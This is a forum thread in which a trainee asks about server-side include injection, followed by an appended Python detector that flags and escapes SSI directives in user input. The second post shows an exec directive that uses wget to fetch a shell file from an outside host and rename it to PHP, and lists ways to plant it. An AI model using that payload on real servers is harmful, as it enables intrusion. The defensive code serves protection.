Server Side Injection Issues
#1
I am doing an online training and I have to know about server side injections.

Could someone please refer me to a GOOD online tutorial that explains SSI in depth for a beginner?

Thanks.

Best,

QMark
#2
From what I understand, Server-side Injection is based on exploiting SSI (Server Side Includes; a simple interpreted server-side scripting language used almost exclusively for the Web).

So I think it can easily be seen as some sort of dynamic HTML based on the server side instead of the client side, using one of the extensions like .shtml, .shtm, .stm, and having the webserver configured to allow SSI: http://httpd.apache.org/docs/2.2/howto/s...onfiguring

For example, blog.shtml contains the following:
Code:
<!--#include virtual="../quote.txt" -->
Which includes a daily quotation. With one change to the file, all the files including blog.shtml will change their content too.

You should read more here: https://en.wikipedia.org/wiki/Server_Side_Includes

So you can try to change code or add your own code to the SSI enabled pages to exploit it. Like:
Code:
<!--#exec cmd="wget http://mysite.com/shell.txt | rename shell.txt shell.php" -->
Spawning a shell and such.

You should read more on OWASP: https://www.owasp.org/index.php/Server-S..._Injection

As for how you manage to change or add code, you just need to look for ways to manipulate the page. Through other vulnerabilities or otherwise. For example:
* Persistent XSS.
* If there's any page upload without proper sanitizing, you can try uploading a shell or .shtml file payload: https://greysec.net/showthread.php?tid=1455
* Maybe get into their CMS/admin/cpanel where you can add new pages or posts.
* Or maybe you've found an SQL injection vulnerability; you can try inserting a new page, post or content into the page.

Just need to think outside the box I guess. Also, for the record, for any questions on how attacks work, I highly recommend you read the OWASP wiki on it.
Reply
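
A defensive check for the injection path described in post #2, as an added example that is not part of the original thread: it flags SSI directives in user-supplied text before that text is stored in an SSI-enabled page, and shows that HTML-escaping stops the server from parsing them. The function names and sample inputs are constructed for illustration.

```python
import html
import re
from urllib.parse import unquote

# SSI directive syntax is <!--#element attribute="value" ... -->.
# Matching is deliberately looser than the server's parser (case, stray
# whitespace) so that near-miss payloads are flagged too.
DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)(.*?)-->", re.IGNORECASE | re.DOTALL)
ATTRIBUTE = re.compile(r"([a-z]+)\s*=\s*([\"'`])(.*?)\2", re.IGNORECASE | re.DOTALL)

# exec runs a program, include pulls in another document; the other
# elements only read or format values but do not belong in user input.
SEVERITY = {"exec": "high", "include": "medium"}


def find_ssi_directives(text):
    """Return one finding per SSI directive found in user-supplied text."""
    findings = []
    # Form fields may arrive percent-encoded; check raw and decoded forms.
    for candidate in dict.fromkeys((text, unquote(text))):
        for match in DIRECTIVE.finditer(candidate):
            element = match.group(1).lower()
            attrs = {k.lower(): v for k, _, v in ATTRIBUTE.findall(match.group(2))}
            finding = {"element": element, "attrs": attrs,
                       "severity": SEVERITY.get(element, "low")}
            if finding not in findings:
                findings.append(finding)
    return findings


def neutralize(text):
    """HTML-escape the text so '<!--#' is stored as '&lt;!--#', which the
    SSI parser no longer recognises as the start of a directive."""
    return html.escape(text, quote=True)


if __name__ == "__main__":
    # Constructed sample submissions (e.g. comment or profile fields).
    samples = [
        "Nice post, thanks!",
        '<!--#include virtual="../quote.txt" -->',
        '<!--#EXEC cmd="placeholder-command" -->',
        "%3C!--%23echo%20var%3D%22DATE_LOCAL%22%20--%3E",
    ]
    for s in samples:
        print(find_ssi_directives(s), "->", neutralize(s))
```

On Apache, `Options +IncludesNOEXEC` keeps SSI enabled while disabling `#exec`, which limits the impact if a directive does get through.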

